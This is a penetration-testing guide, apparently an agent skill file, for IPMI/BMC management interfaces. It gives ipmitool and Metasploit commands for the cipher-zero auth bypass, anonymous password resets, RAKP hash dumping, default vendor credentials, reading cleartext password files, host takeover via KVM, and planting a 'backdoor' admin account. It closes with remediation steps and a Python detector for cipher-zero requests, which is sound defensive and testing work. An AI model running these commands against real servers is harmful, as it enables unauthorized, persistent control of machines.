pentesting-ipmi


Testing IPMI / BMC out-of-band management interfaces (default 623/UDP, sometimes TCP) for the cipher-zero authentication bypass, RAKP password-hash retrieval, anonymous/default BMC credentials, cleartext password storage, and host takeover via KVM/SOL during authorized engagements.

By xalgord. Updated 6/6/2026.

name: pentesting-ipmi
description: Testing IPMI / BMC out-of-band management interfaces (default 623/UDP, sometimes TCP) for the cipher-zero authentication bypass, RAKP password-hash retrieval, anonymous/default BMC credentials, cleartext password storage, and host takeover via KVM/SOL during authorized engagements.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
  • penetration-testing
  • network-services
  • ipmi
version: '1.0'
author: xalgorix
license: Apache-2.0

Pentesting IPMI (port 623)

When to Use

  • Default port 623/udp (sometimes 623/tcp) on Baseboard Management Controllers (BMC) — Supermicro, Dell iDRAC, HP iLO, IBM IMM, Fujitsu iRMC, Oracle/Sun ILOM, ASUS iKVM.
  • When nmap/scanners show asf-rmcp/ipmi on 623, or you find an out-of-band management LAN.
  • BMCs run independent of the host OS/power state, so compromise = persistent, OS-independent control of the server (power, KVM, serial-over-LAN, virtual media).

Quick Enumeration

# Find the port (UDP is primary)
nmap -n -p 623 10.0.0.0/24
nmap -n -sU -p 623 10.0.0.0/24

# Version identification
nmap -sU --script ipmi-version -p 623 10.10.10.10
msf > use auxiliary/scanner/ipmi/ipmi_version

# Install the client
apt-get install ipmitool

Critical: Checks Most Often Missed

  • Cipher type 0 (cipher-zero) auth bypass — IPMI 2.0 flaw (Dan Farmer): with a valid username, any password is accepted. Found across HP, Dell, Supermicro BMCs. List and modify users, including resetting passwords:
msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list                 # any password works
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123
  • RAKP password-hash retrieval — the IPMI 2.0 RAKP handshake returns a salted hash (HMAC-MD5/SHA1) for any existing username; crack it offline:
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
  • Anonymous access — many BMCs ship with a null username/password account that can reset named accounts:
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword
  • Default credentials — Dell iDRAC root:calvin, IBM IMM USERID:PASSW0RD (with the digit zero, not the letter O), Supermicro ADMIN:ADMIN, Oracle/Sun ILOM root:changeme, ASUS iKVM admin:admin. (HP iLO uses a factory-randomized 8-char password.)
  • Cleartext password storage — Supermicro stores IPMI passwords in /nv/PSBlock or /nv/PSStore; readable once you reach the BMC filesystem. Supermicro's UPnP SSDP listener (UDP 1900) had a root-RCE bug (exploit/multi/upnp/libupnp_ssdp_overflow).

How to CONFIRM

  • Cipher-zero: auxiliary/scanner/ipmi/ipmi_cipher_zero reports VULNERABLE, or ipmitool ... -C 0 ... user list returns the user table with a wrong password.
  • Hash dump: ipmi_dumphashes outputs crackable hmac hashes per username.
  • Anonymous: ipmitool -U '' -P '' user list returns the user table.
  • Defaults: a documented vendor cred logs in (user list succeeds).

Workflow

Step 1: Enumerate

Sweep 623/udp, identify IPMI version and vendor (ipmi-version). Vendor tells you which default creds and storage paths to try.

Step 2: Authenticate / unauth access

Run cipher-zero and anonymous checks first (no creds needed). Dump RAKP hashes for every known username and crack offline (hashcat). Try vendor default creds.

Step 3: Exploit / Extract

  • With cipher-zero or recovered creds, enumerate and reset accounts via ipmitool -I lanplus.
  • Crack dumped RAKP hashes to recover real BMC passwords.
  • On Supermicro, read stored cleartext passwords (cat /nv/PSBlock) once on the BMC.

Step 4: Post-access / pivot

Administrative BMC access => host takeover:

  • KVM / virtual media: reboot host into a root shell via GRUB (init=/bin/sh) or boot a rescue ISO to manipulate the host disk (insert backdoor, extract data).
  • Serial-over-LAN (SOL): take over a logged-in physical/serial console via ipmitool ... sol.
  • Persistent backdoor account (works from a compromised host's local BMC interface, no auth):
ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4          # 4 = ADMINISTRATOR
ipmitool user list

Key Concepts

| Concept | Description |
| --- | --- |
| BMC | Baseboard Management Controller — independent micro-controller running IPMI; survives OS/power state |
| Cipher 0 | IPMI 2.0 cipher suite that disables auth — any password accepted for a valid user |
| RAKP | IPMI 2.0 auth handshake that leaks a crackable salted password hash per username |
| lanplus | (-I lanplus) ipmitool interface for IPMI 2.0 over LAN (RMCP+) |
| SOL / KVM | Serial-over-LAN and remote keyboard/video/mouse — full host console control |
| Anonymous login | Null user/pass account enabled by default on many BMCs |

Tools & Systems

| Tool | Purpose |
| --- | --- |
| ipmitool | Primary client: user mgmt, SOL, KVM, password reset (-I lanplus -C 0) |
| nmap ipmi-version NSE | Version/vendor fingerprint on 623/udp |
| Metasploit ipmi_cipher_zero | Detect cipher-zero auth bypass |
| Metasploit ipmi_dumphashes | Retrieve RAKP password hashes |
| Metasploit ipmi_version | Scanner for IPMI version |
| hashcat | Crack dumped RAKP HMAC-MD5/SHA1 hashes |

Common Scenarios

Scenario 1: Cipher-zero full control

A Supermicro BMC is cipher-zero vulnerable; ipmitool -C 0 lists users and resets root, granting KVM/SOL access and a host reboot into a root shell.

Scenario 2: Hash dump and crack

ipmi_dumphashes pulls the RAKP hash for ADMIN; hashcat recovers the password, which is reused on the host SSH/web interfaces.

Scenario 3: Default creds to host takeover

A Dell iDRAC accepts root:calvin; virtual media mounts a rescue ISO and a backdoor is written to the host filesystem.

Output Format

## IPMI / BMC Finding

**Service**: IPMI (623/udp)
**Severity**: <Critical|High>
**Target**: <IP>:623  Vendor/Version: <Supermicro | iDRAC | iLO ...> IPMI 2.0

### Evidence
- Cipher-zero auth bypass: VULNERABLE (user list returned with bogus password)
- RAKP hashes dumped for users: <ADMIN, root, ...> (cracked: <yes/no>)
- Anonymous/default creds: <'' / root:calvin> accepted
- Host impact: KVM/SOL access; backdoor account 'backdoor' (ADMINISTRATOR) added

### Reproduction
msf> use auxiliary/scanner/ipmi/ipmi_cipher_zero
ipmitool -I lanplus -C 0 -H <IP> -U root -P anything user list

### Recommendation
1. Disable cipher suite 0 on all BMCs
2. Isolate BMCs on a dedicated management VLAN, never Internet-facing
3. Replace default/anonymous credentials; enforce strong unique BMC passwords
4. Patch BMC firmware (Supermicro UPnP/SSDP); restrict RAKP exposure
5. Disable unused KVM/SOL/virtual-media features
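A detection-side complement to recommendation 1, added here as an example and not part of the original skill: it parses RMCP+ Open Session Request datagrams (the first packet of an IPMI 2.0 lanplus session on 623/udp) and raises an alert when the requested authentication algorithm is 0 (RAKP-none), which is exactly the cipher suite 0 request a hardened BMC should refuse and a management-VLAN sensor should flag. The builder, the sample datagrams and the label strings are constructed for this example.

```python
import struct

# Field values from the IPMI 2.0 spec: RMCP header, RMCP+ session header, Open Session Request
RMCP_VERSION, RMCP_CLASS_IPMI = 0x06, 0x07
AUTH_FORMAT_RMCP_PLUS, PAYLOAD_OPEN_SESSION_REQ = 0x06, 0x10
AUTH_ALG = {0: "RAKP-none", 1: "RAKP-HMAC-SHA1", 2: "RAKP-HMAC-MD5", 3: "RAKP-HMAC-SHA256"}
INTEG_ALG = {0: "none", 1: "HMAC-SHA1-96", 2: "HMAC-MD5-128", 3: "MD5-128", 4: "HMAC-SHA256-128"}
CONF_ALG = {0: "none", 1: "AES-CBC-128", 2: "xRC4-128", 3: "xRC4-40"}


def parse_open_session_request(pkt: bytes):
    """Return the algorithms an RMCP+ Open Session Request asks for, or None for any other datagram."""
    # RMCP header: version, reserved, sequence number, message class (low nibble = 7 for IPMI)
    if len(pkt) < 16 or pkt[0] != RMCP_VERSION or (pkt[3] & 0x0F) != RMCP_CLASS_IPMI:
        return None
    hdr = pkt[4:16]  # auth/format (1), payload type (1), session id (4), session seq (4), length (2)
    if hdr[0] != AUTH_FORMAT_RMCP_PLUS or (hdr[1] & 0x3F) != PAYLOAD_OPEN_SESSION_REQ:
        return None
    (plen,) = struct.unpack_from("<H", hdr, 10)
    payload = pkt[16:16 + plen]
    if len(payload) != 32:  # tag, max priv, 2 reserved, console sid, 3 x 8-byte algorithm records
        return None
    algs = {}
    for off in (8, 16, 24):  # record: type, 2 reserved, length (8), algorithm (bits 5:0), 3 reserved
        if payload[off + 3] != 8:
            return None
        algs[payload[off]] = payload[off + 4] & 0x3F
    return {"max_priv": payload[1] & 0x0F, "console_sid": struct.unpack_from("<I", payload, 4)[0],
            "auth": algs.get(0, 0), "integ": algs.get(1, 0), "conf": algs.get(2, 0)}


def classify(pkt: bytes):
    """Detection label: auth algorithm 0 (RAKP-none) is the cipher suite 0 request a BMC should refuse."""
    osr = parse_open_session_request(pkt)
    if osr is None:
        return None
    if osr["auth"] == 0:
        return "ALERT cipher-zero request (auth=RAKP-none) from console 0x%08x" % osr["console_sid"]
    return "ok %s/%s/%s" % (AUTH_ALG.get(osr["auth"], "auth?"), INTEG_ALG.get(osr["integ"], "integ?"),
                            CONF_ALG.get(osr["conf"], "conf?"))


def build_open_session_request(auth: int, integ: int, conf: int, sid: int = 0xA0A1A2A3) -> bytes:
    """Constructed sample datagram (ADMINISTRATOR privilege requested) laid out per the spec."""
    payload = bytes([0x00, 0x04, 0, 0]) + struct.pack("<I", sid)
    for rec_type, alg in ((0, auth), (1, integ), (2, conf)):
        payload += bytes([rec_type, 0, 0, 8, alg, 0, 0, 0])
    rmcp = bytes([RMCP_VERSION, 0x00, 0xFF, RMCP_CLASS_IPMI])
    session = bytes([AUTH_FORMAT_RMCP_PLUS, PAYLOAD_OPEN_SESSION_REQ]) + bytes(8) + struct.pack("<H", len(payload))
    return rmcp + session + payload
```

In a real deployment the parser is fed the UDP payload of each 623/udp datagram from a sensor or pcap; a BMC that answers such a request with a successful Open Session Response is the one the cipher-zero check above would report as VULNERABLE.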